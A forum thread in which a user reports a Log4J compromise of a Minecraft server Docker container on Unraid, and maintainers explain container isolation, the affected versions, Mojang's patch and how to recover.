January 21, 20224 yr Hey, I have noticed that one of my Docker containers got infected through the Log4J Attack. And now I'm not sure how to deal with it. Is it possible that it escaped the docker container and the whole unraid installation is infected ?
January 21, 20224 yr Yes! Wtf you can’t post a message like that and not at least let others know what container is vulnerable.
January 22, 20224 yr Author Yea sorry forgot mentioning that it's a Minecraft server (binhex-minecraftjava). Im pretty sure it's log4j because in the game-log files I see the chat Message used by a very suspicious username "INETDataSurveyP35x". Edited January 22, 20224 yr by Senu
January 22, 20224 yr One of the upshots of docker is that the rest of the files on your server that you have are only visible to any given app if YOU give the app permission to them. @binhex, any thoughts?
January 22, 20224 yr 17 minutes ago, Squid said: One of the upshots of docker is that the rest of the files on your server that you have are only visible to any given app if YOU give the app permission to them. @binhex, any thoughts? as im sure anybody who runs minecraft java is aware (well reported on the internet), minecraft was highlighted as having the log4j vulnerability, this was then patched by mojang and quickly released, but obviously the patch and fix is only available for the current latest version of minecraft java, if you run earlier versions then you are still vulnerable, im assuming the OP was indeed running a version prior to the fixed version (1.18.1), there are according to mojang certain mitigations you can do for earlier versions, but this would be up to the user to perform these, link to doc:- https://help.minecraft.net/hc/en-us/articles/4416199399693-Security-Vulnerability-in-Minecraft-Java-Edition so as far as damage limitation goes, as long as the OP did not add any additional volume binds then it will be limited to /config only, so a quick restore from backup or at worst, copy your world somewhere, then delete everything in /config, fix up to prevent the vulnerability and restart container and copy the world back should suffice.
January 22, 20224 yr 30 minutes ago, binhex said: fixed version (1.18.1) I'm assuming that the current container is this version or greater?
January 22, 20224 yr I'm assuming that the current container is this version or greater?Correct, latest version is built automatically and is the default version included with the image.Sent from my CLT-L09 using Tapatalk
January 22, 20224 yr I tell ya what, I will firstly put a big fat warning on my threads and secondly I will see if I can detect the version of Minecraft jar, if so I can attempt to patch for the user using the guidance in the link above.Edit just to be clear, anything running Minecraft Java is potentially vulnerable when using earlier versions, so mineos-node and crafty images are also prone when not running Minecraft server latest versions.Sent from my CLT-L09 using Tapatalk
January 23, 20224 yr Author @binhex @squid ... you all went above and beyond! I really appreciate the Help. I'm still quite new to the whole unraid World and this in my first question on the forum here. Really cool to see a active and supporting community. I didn't Bind any any Drives/Directories to the container so the damage is minimal. I'm using the container with a "custom" forge.jar still running 1.7.10.
January 23, 20224 yr 17 hours ago, Senu said: @binhex @squid ... you all went above and beyond! I really appreciate the Help. I'm still quite new to the whole unraid World and this in my first question on the forum here. Really cool to see a active and supporting community. I didn't Bind any any Drives/Directories to the container so the damage is minimal. I'm using the container with a "custom" forge.jar still running 1.7.10. yep running any minecraft server v1.7.1 to v1.18.0 will expose you to the vulnerability, so that def explains why it happened. So i've done what i can here, i have spammed all Minecraft Java support threads that i own with a warning and what to do to patch, i have also automated patching of binhex/minecraftserver, however its not possible for me to automatically patch mineos-node or crafty (multi minecraft server frontend), as configuration for each server is done through the server web ui and thus must be done by the user for each running minecraft instance.
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.